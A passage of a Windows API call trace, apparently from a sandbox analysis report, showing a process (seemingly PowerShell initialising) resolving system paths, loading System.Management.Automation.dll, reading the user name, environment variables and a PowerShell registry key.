	[0112.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.909] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.909] SetErrorMode (uMode=0x1) returned 0x1
	[0112.909] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0112.910] SetErrorMode (uMode=0x1) returned 0x1
	[0112.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.910] SetErrorMode (uMode=0x1) returned 0x1
	[0112.910] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0112.910] SetErrorMode (uMode=0x1) returned 0x1
	[0112.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0112.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.910] SetErrorMode (uMode=0x1) returned 0x1
	[0112.910] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0112.910] SetErrorMode (uMode=0x1) returned 0x1
	[0112.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.911] SetErrorMode (uMode=0x1) returned 0x1
	[0112.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0112.911] SetErrorMode (uMode=0x1) returned 0x1
	[0112.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0112.912] SetErrorMode (uMode=0x1) returned 0x1
	[0112.913] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd2f0 | out: lpFileInformation=0xcd2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0112.913] SetErrorMode (uMode=0x1) returned 0x1
	[0112.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.000] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0113.000] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd658 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd658) returned 0x1
	[0113.001] CoTaskMemFree (pv=0x1b0a10) 
	[0113.001] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0113.001] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd698 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd698) returned 1
	[0113.001] CoTaskMemFree (pv=0x1cf910) 
	[0113.002] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x334ac60*="Available", lpRawData=0x334a9f0) returned 1
	[0113.010] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.010] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.011] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.011] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.014] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.014] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0113.014] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.014] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.014] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0113.014] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.016] GetCurrentProcessId () returned 0x7cc
	[0113.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.018] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd678 | out: phkResult=0xcd678*=0x334) returned 0x0
	[0113.018] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5fc, lpData=0x0, lpcbData=0xcd5f8*=0x0 | out: lpType=0xcd5fc*=0x1, lpData=0x0, lpcbData=0xcd5f8*=0x56) returned 0x0
	[0113.018] CoTaskMemAlloc (cb=0x5a) returned 0x1b851af0
	[0113.018] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd5cc, lpData=0x1b851af0, lpcbData=0xcd5c8*=0x56 | out: lpType=0xcd5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd5c8*=0x56) returned 0x0
	[0113.018] CoTaskMemFree (pv=0x1b851af0) 
	[0113.019] RegCloseKey (hKey=0x334) returned 0x0
	[0113.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.020] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0113.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.020] CoTaskMemFree (pv=0x1b8471c0) 
	[0113.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0113.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
